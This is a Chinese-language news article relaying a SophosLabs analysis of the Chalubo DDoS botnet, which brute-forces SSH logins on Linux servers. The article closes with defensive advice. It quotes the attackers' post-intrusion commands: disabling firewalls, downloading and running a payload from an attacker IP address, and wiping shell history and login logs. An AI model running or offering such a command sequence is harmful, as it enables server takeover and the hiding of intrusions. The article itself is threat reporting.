網路安全公司Sophos旗下SophosLabs在本週一（10月22日）發表的一篇博文中指出，他們近兩個月一直在持續關注一場開始於9月初的網路攻擊活動，目標是開啟了SSH伺服器的Linux伺服器。而在這場攻擊活動中，攻擊者的主要目的在於傳播一種被他們稱之為“Chalubo”的最新自動化DDos攻擊工具。

SophosLabs的分析表明，攻擊者使用了ChaCha流密碼來加密Chalubo的主元件以及相應的Lua指令碼，而在最新的版本中，攻擊者已經採用了更常見的Windows惡意軟體原理來阻止對Chalubo的檢測。不變的是，最新版本的Chalubo同樣整合了來自Xor.DDoS和Mirai惡意軟體家族的程式碼。

在8月下旬開始傳播，目前已有多個版本

根據SophosLabs的說法，Chalubo於8月下旬開始通過網路感染目標裝置，攻擊者隨後會通過在受感染裝置上發出命令來檢索它。Chalubo實際上由三部分組成：下載模組（downloader）、主bot程式（最初僅能夠在具有x86處理器架構的系統上執行）和Lua命令指令碼。

到了10月中旬，攻擊者開始發出檢索Elknot dropper（檢測為Linux/DDoS-AZ）的命令，它被用於提供Chalubo（ChaCha-Lua-bot）軟體包的其餘部分。

此外，目前已經出現了能夠在不同處理器架構上執行的各種bot程式版本，包括32位和64位的ARM、x86、x86_64、MIPS、MIPSEL和PowerPC。這可能表明，這場網路攻擊活動的測試階段已經結束，或許我們之後會看到基於Chalubo攻擊活動數量的持續上升。

嘗試暴力破解密碼，強制登入SSH伺服器

SophosLabs表示，由他們部署的蜜罐系統最初在2018年9月6日記錄了相關攻擊。Chalubo的bot程式首先會嘗試暴力破解密碼，以強制登入SSH伺服器。

一旦攻擊者獲得了對目標裝置的訪問許可權，他們就會發出以下命令：

/etc/init.d/iptables stop

service iptables stop

SuSEfirewall2 stop

reSuSEfirewall2 stop

chattr -i /usr/bin/wget

chmod 755 /usr/bin/wget

yum install -y wget

wget -c hxxp://117.21.191.108:8694/libsdes -P /usr/bin/

chmod 777 /usr/bin/libsdes

nohup /usr/bin/libsdes > /dev/null 2>&1 &

export HISTFILE=/dev/null

rm -f /var/log/wtmp

history -c

雖然攻擊手法十分常見，但攻擊者使用了分層方法來下載惡意元件，並且使用的加密方法對於Linux惡意軟體而言，也是我們所不常見的。

事實上，如果仔細檢視負責持續攻擊的程式碼段的話，我們能夠發現Chalubo已經從Xor.DDoS惡意軟體家族中複製了DelService和AddService函式。另外，一些程式碼段複製於Mirai惡意軟體，如一些隨機函式和util_local_addr函式的擴充套件程式碼。

SophosLabs提出的一些預防建議和防範措施

由於Chalubo感染目標系統的主要方法是通過對使用通用的使用者名稱和密碼組合對SSH伺服器的登入憑證進行暴力破解，因此SophosLabs建議SSH伺服器的系統管理員（包括嵌入式裝置）應更改這些裝置上的預設密碼。如果可能的話，系統管理員最好使用SSH金鑰，而不是登入密碼。

此外，與其他任何裝置一樣，保持系統更新、及時安裝官方釋出的修復補丁，以及安裝實用的防病毒軟體都會是很好的主動防禦措施。